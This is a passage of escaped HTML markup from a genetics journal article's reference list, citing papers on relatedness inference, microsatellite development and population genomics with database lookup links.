class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-15-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-15\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.15\u0022 data-doi=\u002210.1086\/321195\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EEpstein\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM. P.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EDuren\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EW. L.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBoehnke\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2000\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EImproved inference of relationship for pairs of individuals.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EAm. J. Hum. Genet.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E67\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E1219\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E1231\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DAmerican%2Bjournal%2Bof%2Bhuman%2Bgenetics%26rft.stitle%253DAm%2BJ%2BHum%2BGenet%26rft.aulast%253DEpstein%26rft.auinit1%253DM.%2BP.%26rft.volume%253D67%26rft.issue%253D5%26rft.spage%253D1219%26rft.epage%253D1231%26rft.atitle%253DImproved%2Binference%2Bof%2Brelationship%2Bfor%2Bpairs%2Bof%2Bindividuals.%26rft_id%253Dinfo%253Adoi%252F10.1086%252F321195%26rft_id%253Dinfo%253Apmid%252F11032786%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1086\/321195\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=11032786\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000165091600019\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-16-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-16\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.16\u0022 data-doi=\u002210.1111\/j.1755-0998.2011.03037.x\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EGardner\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM. G.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EFitch\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. J.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBertozzi\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ET.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ELowe\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. J.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2011\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003ERise of the machines\u2014recommendations for ecologists when using next generation sequencing for microsatellite development.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EMol. Ecol. Resour.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E11\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E1093\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E1101\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DMol.%2BEcol.%2BResour.%26rft.volume%253D11%26rft.spage%253D1093%26rft_id%253Dinfo%253Adoi%252F10.1111%252Fj.1755-0998.2011.03037.x%26rft_id%253Dinfo%253Apmid%252F21679314%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1111\/j.1755-0998.2011.03037.x\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=21679314\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-17-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-17\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.17\u0022 data-doi=\u002210.1186\/1471-2164-15-16\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EGreminger\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EStolting\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EK.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ENater\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EGoossens\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EB.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EArora\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EN.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-etal\u0022\u003Eet al.\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2014\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EGeneration of SNP datasets for orangutan population genomics using improved reduced-representation sequencing and direct comparisons of SNP calling algorithms.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EBMC Genomics\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E15\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E16\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DBMC%2BGenomics%26rft.volume%253D15%26rft.spage%253D16%26rft_id%253Dinfo%253Adoi%252F10.1186%252F1471-2164-15-16%26rft_id%253Dinfo%253Apmid%252F24405840%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1186\/1471-2164-15-16\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=24405840\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-18-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-18\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.18\u0022 data-doi=\u002210.1371\/journal.pone.0034267\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EHenn\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EB. M.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EHon\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EL.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EMacpherson\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ. M.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EEriksson\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EN.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ESaxonov\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ES.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-etal\u0022\u003Eet al.\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2012\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003ECryptic distant relatives are common in both isolated and cosmopolitan genetic samples.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EPLoS One\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E7\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003Ee34267\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.stitle%253DPLoS%2BONE%26rft.aulast%253DHenn%26rft.auinit1%253DB.%2BM.%26rft.volume%253D7%26rft.issue%253D4%26rft.spage%253De34267%26rft.epage%253De34267%26rft.atitle%253DCryptic%2Bdistant%2Brelatives%2Bare%2Bcommon%2Bin%2Bboth%2Bisolated%2Band%2Bcosmopolitan%2Bgenetic%2Bsamples.%26rft_id%253Dinfo%253Adoi%252F10.1371%252Fjournal.pone.0034267%26rft_id%253Dinfo%253Apmid%252F22509285%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1371\/journal.pone.0034267\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=22509285\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-19-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-19\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-other\u0022 id=\u0022cit-5.9.1815.19\u0022 data-doi=\u002210.1534\/g3.113.007500\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EHill\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EW. G.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EWhite\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EI. M. S.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2013\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EIdentification of pedigree relationship from genome sharing.\u003C\/span\u003E \u003Cspan class=\u0022cit-source\u0022\u003EG3 (Bethesda)\u003C\/span\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E3\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E1553\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E1571\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DG3%2B%2528Bethesda%2529%26rft_id%253Dinfo%253Adoi%252F10.1534%252Fg3.113.007500%26rft_id%253Dinfo%253Apmid%252F23893739%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/ijlink\/YTozOntzOjQ6InBhdGgiO3M6MTQ6Ii9sb29rdXAvaWpsaW5rIjtzOjU6InF1ZXJ5IjthOjQ6e3M6ODoibGlua1R5cGUiO3M6NDoiQUJTVCI7czoxMToiam91cm5hbENvZGUiO3M6MzoiZ2dnIjtzOjU6InJlc2lkIjtzOjg6IjMvOS8xNTUzIjtzOjQ6ImF0b20iO3M6MTg6Ii9nZ2cvNS85LzE4MTUuYXRvbSI7fXM6ODoiZnJhZ21lbnQiO3M6MDoiIjt9\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-ijlink\u0022\u003E\u003Cspan\u003E\u003Cspan class=\u0022cit-reflinks-abstract\u0022\u003EAbstract\u003C\/span\u003E\u003Cspan class=\u0022cit-sep cit-reflinks-variant-name-sep\u0022\u003E\/\u003C\/span\u003E\u003Cspan class=\u0022cit-reflinks-full-text\u0022\u003E\u003Cspan class=\u0022free-full-text\u0022\u003EFREE \u003C\/span\u003EFull Text\u003C\/span\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-20-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-20\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.20\u0022 data-doi=\u002210.1111\/mec.12741\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EHoban\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ES.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2014\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EAn overview of the utility of population simulation software in molecular ecology.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EMol. Ecol.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E23\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E2383\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E2401\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DMol.%2BEcol.%26rft.volume%253D23%26rft.spage%253D2383%26rft_id%253Dinfo%253Adoi%252F10.1111%252Fmec.12741%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1111\/mec.12741\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-21-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-21\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.21\u0022 data-doi=\u002210.1101\/gr.115972.110\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EHuff\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EC. D.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EWitherspoon\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ED. J.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ESimonson\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ET. S.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EXing\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EWatkins\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EW. S.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-etal\u0022\u003Eet al.\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2011\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EMaximum-likelihood estimation of recent shared ancestry (ERSA).\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EGenome Res.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E21\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E768\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E774\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DGenome%2BRes.%26rft_id%253Dinfo%253Adoi%252F10.1101%252Fgr.115972.110%26rft_id%253Dinfo%253Apmid%252F21324875%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/ijlink\/YTozOntzOjQ6InBhdGgiO3M6MTQ6Ii9sb29rdXAvaWpsaW5rIjtzOjU6InF1ZXJ5IjthOjQ6e3M6ODoibGlua1R5cGUiO3M6NDoiQUJTVCI7czoxMToiam91cm5hbENvZGUiO3M6NjoiZ2Vub21lIjtzOjU6InJlc2lkIjtzOjg6IjIxLzUvNzY4IjtzOjQ6ImF0b20iO3M6MTg6Ii9nZ2cvNS85LzE4MTUuYXRvbSI7fXM6ODoiZnJhZ21lbnQiO3M6MDoiIjt9\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-ijlink\u0022\u003E\u003Cspan\u003E\u003Cspan class=\u0022cit-reflinks-abstract\u0022\u003EAbstract\u003C\/span\u003E\u003Cspan class=\u0022cit-sep cit-reflinks-variant-name-sep\u0022\u003E\/\u003C\/span\u003E\u003Cspan class=\u0022cit-reflinks-full-text\u0022\u003E\u003Cspan class=\u0022free-full-text\u0022\u003EFREE \u003C\/span\u003EFull Text\u003C\/span\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-22-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-22\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.22\u0022 data-doi=\u002210.1111\/j.1755-0998.2009.02787.x\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EJones\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EO. R.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EWang\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2010\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003ECOLONY: a program for parentage and sibship inference from multilocus genotype data.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EMol. Ecol. Resour.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E10\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E551\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E555\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca 